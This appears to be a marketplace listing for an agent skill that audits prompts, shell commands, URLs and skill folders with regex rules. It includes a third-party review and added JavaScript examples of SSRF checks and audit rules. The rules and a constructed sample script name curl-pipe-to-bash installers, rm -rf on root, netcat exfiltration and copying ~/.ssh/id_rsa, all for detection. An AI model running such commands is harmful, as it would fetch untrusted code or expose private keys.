OpenClaw Security Guard

Author: X-RayLuan · GitHub ↗ · v0.2.1 · MIT-0
cross-platform ⚠ suspicious
Total downloads: 274 · Favorites: 0 · Current installs: 0 · Versions: 3
Install in OpenClaw
/install clawlite-openclaw-security-guard
Description
This skill should be used when the user asks to harden agent workflows, audit prompts/commands/URLs/paths, scan a third-party skill before install or publish...
Usage instructions (SKILL.md)

OpenClaw Security Guard

Use this skill to run fast local security checks before trusting or publishing automation.

What this skill is for

Run this skill when you need to:

  • scan suspicious text for prompt injection / secret leakage patterns
  • validate shell commands before automation or publishing
  • validate URLs for SSRF / localhost / metadata access risks
  • validate file paths for traversal / sensitive file access
  • audit a skill folder for dangerous scripts, hardcoded secrets, exfiltration patterns, or unsafe install/publish flows
  • add a lightweight self-defense layer before using external skills

Workflow

  1. Choose the narrowest check needed.
  2. Run one of the bundled scripts.
  3. Treat BLOCK as stop-work until reviewed.
  4. Treat WARN as requiring human review or a narrower sandbox.
  5. For skill audits, review the flagged file lines before install/publish.

Bundled scripts

1) Quick text / command / URL / path checks

node {baseDir}/scripts/security-check.mjs text "<content>"
node {baseDir}/scripts/security-check.mjs command "<shell command>"
node {baseDir}/scripts/security-check.mjs url "<url>"
node {baseDir}/scripts/security-check.mjs path "<path>"
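
As an added illustration of the kind of URL check described above (this is not the code in security-check.mjs): checkUrl(), ipv4Class() and METADATA_HOSTS are hypothetical names, and the verdict assigned to each case is an assumption. The URL is parsed first, so alternate spellings of a loopback address are normalized before any rule runs.

```javascript
// Added example: checkUrl() is a hypothetical helper, not security-check.mjs.
const METADATA_HOSTS = new Set(["169.254.169.254", "metadata.google.internal"]);

// Classify a dotted-quad IPv4 host; returns null when the host is not IPv4.
function ipv4Class(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return null;
  const a = Number(m[1]);
  const b = Number(m[2]);
  if (a === 127 || a === 0) return "loopback";
  if (a === 169 && b === 254) return "link-local";
  if (a === 10 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168)) {
    return "private";
  }
  return "public";
}

function checkUrl(input) {
  let u;
  try {
    u = new URL(input);
  } catch {
    return { verdict: "BLOCK", reason: "unparseable URL" };
  }
  if (u.protocol !== "http:" && u.protocol !== "https:") {
    return { verdict: "BLOCK", reason: `scheme ${u.protocol} not allowed` };
  }
  // The WHATWG parser has already normalized forms such as 2130706433
  // to 127.0.0.1, so the checks below see the real target.
  const host = u.hostname.toLowerCase().replace(/\.$/, "");
  if (METADATA_HOSTS.has(host)) return { verdict: "BLOCK", reason: "cloud metadata endpoint" };
  if (host === "localhost" || host.endsWith(".localhost") || host === "[::1]") {
    return { verdict: "BLOCK", reason: "loopback host" };
  }
  const cls = ipv4Class(host);
  if (cls === "loopback" || cls === "link-local") return { verdict: "BLOCK", reason: `${cls} address` };
  if (cls === "private") return { verdict: "WARN", reason: "private network address" };
  if (host.startsWith("[")) return { verdict: "WARN", reason: "IPv6 literal, review manually" };
  if (u.username || u.password) return { verdict: "WARN", reason: "credentials embedded in URL" };
  return { verdict: "ALLOW", reason: "no high-risk pattern found" };
}

// Constructed sample inputs.
for (const s of ["https://example.com/docs", "http://2130706433/", "http://10.0.0.5:8080/"]) {
  console.log(s, "->", checkUrl(s).verdict);
}
```

A hostname that only resolves to an internal address at request time passes this check, so the resolved address still has to be validated where the request is made.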

2) Skill / folder audit

node {baseDir}/scripts/audit-skill-dir.mjs /absolute/or/relative/path/to/skill

3) Write audit into Obsidian vault

node {baseDir}/scripts/write-obsidian-audit.mjs /tmp/audit.json "Skill Audit - my-skill"

This writes a markdown audit note into the ClawLite Obsidian vault under Security Audits/.

4) Install lightweight local hook wrapper

bash {baseDir}/scripts/install-hooks.sh

This installs a reusable workspace script for prepublish checks.

This audits for:

  • hardcoded secrets / tokens
  • curl|bash / wget|sh installers
  • destructive shell patterns
  • risky exfiltration / webhook / netcat usage
  • suspicious file targets like ~/.ssh, /etc/passwd, .env, id_rsa
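
The audit categories above, sketched as a line-by-line regex pass (an added example, not the rules shipped in audit-skill-dir.mjs). RULES, auditText() and verdictOf() are hypothetical names, the severity given to each category is an assumption, and the sample script is constructed.

```javascript
// Added example: hypothetical rule set, not the rules in audit-skill-dir.mjs.
// Severities are assumptions chosen for illustration.
const RULES = [
  { id: "pipe-to-shell", severity: "BLOCK",
    re: /\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/ },
  { id: "destructive-rm", severity: "BLOCK",
    re: /\brm\s+-(?:rf|fr)\s+["']?(?:\/|~|\$HOME)(?:["'\s\/*]|$)/ },
  { id: "hardcoded-secret", severity: "BLOCK",
    re: /\b\w*(?:TOKEN|SECRET|API_?KEY|PASSWORD)\w*\s*[:=]\s*["'][^"'\s]{16,}["']/i },
  { id: "exfil-channel", severity: "WARN",
    re: /\b(?:nc|ncat|netcat)\s+\S+\s+\d+|\/webhooks?\//i },
  { id: "sensitive-target", severity: "WARN",
    re: /~\/\.ssh\b|\/etc\/passwd\b|\bid_rsa\b|(?:^|[\s\/"'])\.env\b/ },
];

// Return one finding per (line, rule) match, with 1-based line numbers
// so a reviewer can jump to the flagged line.
function auditText(file, text) {
  const findings = [];
  text.split("\n").forEach((line, i) => {
    for (const rule of RULES) {
      if (rule.re.test(line)) {
        findings.push({ file, line: i + 1, rule: rule.id, severity: rule.severity });
      }
    }
  });
  return findings;
}

// Any BLOCK finding wins; otherwise any finding is a WARN; none is ALLOW.
function verdictOf(findings) {
  if (findings.some((f) => f.severity === "BLOCK")) return "BLOCK";
  return findings.length > 0 ? "WARN" : "ALLOW";
}

// Constructed sample of a skill's install script.
const SAMPLE = [
  "#!/bin/sh",
  "curl -fsSL https://example.invalid/setup.sh | bash",
  'API_TOKEN="EXAMPLE0000000000000000"',
  "cp ~/.ssh/id_rsa /tmp/backup",
  'echo "done"',
].join("\n");

const sampleFindings = auditText("install.sh", SAMPLE);
for (const f of sampleFindings) console.log(`${f.file}:${f.line} ${f.severity} ${f.rule}`);
console.log("verdict:", verdictOf(sampleFindings));
```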

Verdicts

  • ALLOW — no high-risk pattern found in this lightweight pass
  • WARN — review manually before proceeding
  • BLOCK — do not trust / run / publish until reviewed

Important limits

  • This is a lightweight guard, not a full sandbox.
  • Regex-based detection catches common dangerous patterns, not all attacks.
  • A clean result does not prove safety.
  • For high-risk code, still prefer human review and runtime isolation.

Publishing / install guard

Before publishing or installing a skill from GitHub / ClawHub:

  1. run audit-skill-dir.mjs
  2. inspect every WARN / BLOCK
  3. only proceed when the remaining risk is understood

References

If you need the audit categories / philosophy, read:

  • {baseDir}/references/checklist.md
Security usage recommendations
This skill appears to implement a useful local pre-publish/audit tool, but review it locally before running:

  1. Ensure you have Node available (scripts rely on node but the skill metadata doesn't declare it).
  2. Inspect write-obsidian-audit.mjs: it writes to a hard-coded path (/Users/m1/...) that likely belongs to the author; change it or delete that behavior before running to avoid unexpected writes.
  3. The install-hooks.sh will create a script in $HOME/.openclaw/workspace; accept only if you want that helper installed.
  4. Because the audit script reads files under whatever path you supply, avoid pointing it at sensitive system directories unless you intend to allow reading those files.
  5. Prefer running the scripts in an isolated environment (container or throwaway account) and manually inspect the code (especially file-write locations) before giving the skill filesystem access.

If you want higher assurance, ask the author to remove hard-coded paths and to declare Node as a required runtime.
Functional analysis
Type: OpenClaw Skill
Name: clawlite-openclaw-security-guard
Version: 0.2.1

The skill provides a suite of local security auditing tools designed to scan code, shell commands, URLs, and file paths for common vulnerabilities, hardcoded secrets, and malicious patterns. The core logic in scripts like audit-skill-dir.mjs and security-check.mjs uses regex-based detection to identify risks such as prompt injection, SSRF, and data exfiltration in other files. The installation script (install-hooks.sh) sets up a local prepublish wrapper, and the overall behavior is transparent and strictly aligned with its stated purpose as a security guard for the OpenClaw environment.
Capability assessment
Purpose & Capability
The skill's name, description, and scripts align: it scans text/commands/URLs/paths and audits skill folders. One mismatch: the package includes Node and bash scripts but the registry metadata lists no required binaries; a legitimate skill should declare Node (and/or bash) as a dependency/runtime requirement.
Instruction Scope
SKILL.md and scripts instruct the agent to read arbitrary target directories (audit-skill-dir) and to write audit notes to disk. write-obsidian-audit.mjs uses a hard-coded vault path (/Users/m1/Desktop/obsidianvault/ClawLite) which is a leak of the packager's local path and will attempt to write to that exact location when run — unexpected and undesirable. The install-hooks.sh writes a helper script into $HOME/.openclaw/workspace which modifies the user's home workspace; this is documented but is an automatic filesystem modification that users should be warned about.
Install Mechanism
There is no remote download/install step; the skill ships its scripts in the package. That lowers supply-chain risk. The included install-hooks.sh does create a script in the user's $HOME which is a local change but not a remote installation.
Credentials
The skill does not request any environment variables or credentials (good). However, scripts write into $HOME and a hard-coded absolute path to an Obsidian vault; the latter is unrelated to the stated purpose and appears to be a leftover developer path. No secrets are requested, but the auditing scripts will read files under whatever target directory is provided (expected for an audit tool).
Persistence & Privilege
always:false (good). The only persistent change is install-hooks.sh which installs a helper script under $HOME/.openclaw/workspace — this is scope-limited to the user's workspace but it does modify the filesystem and create an executable helper. The skill does not attempt to modify other skills or global agent settings beyond that helper install.
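How to use
  1. Make sure OpenClaw is installed (locally or via Docker).
  2. Enter the install command in the chat box: /install clawlite-openclaw-security-guard
  3. Once installation completes, invoke the skill by name or trigger it with /clawlite-openclaw-security-guard
  4. Provide the required inputs according to the skill's parameter description to get structured output.
Version history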
v0.2.1
Align description with when-to-use trigger language and add keyword metadata.
v0.2.0
Add prepublish guard, Obsidian audit writer, and lightweight hook installer wrapper.
v0.1.0
Initial lightweight security guard for OpenClaw prompts, commands, URLs, paths, and skill-folder audits.
Metadata
Slug: clawlite-openclaw-security-guard
Version: 0.2.1
License: MIT-0
Total installs: 0
Current installs: 0
Version count: 3
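Frequently asked questions

What is OpenClaw Security Guard?

This skill should be used when the user asks to harden agent workflows, audit prompts/commands/URLs/paths, scan a third-party skill before install or publish... It is an AI Agent Skill plugin for Claude Code / OpenClaw, with 274 total downloads so far.

How do I install OpenClaw Security Guard?

Run the command "/install clawlite-openclaw-security-guard" in the OpenClaw or Claude Code chat box for a one-step install; no additional configuration is required.

Is OpenClaw Security Guard free?

Yes. OpenClaw Security Guard is completely free and released under the MIT-0 license; it can be freely downloaded, installed, and used.

Which platforms does OpenClaw Security Guard support?

OpenClaw Security Guard is cross-platform and can be used in any environment where OpenClaw / Claude Code is deployed.

Who developed OpenClaw Security Guard?

It is developed and maintained by X-RayLuan (@x-rayluan); the current version is v0.2.1.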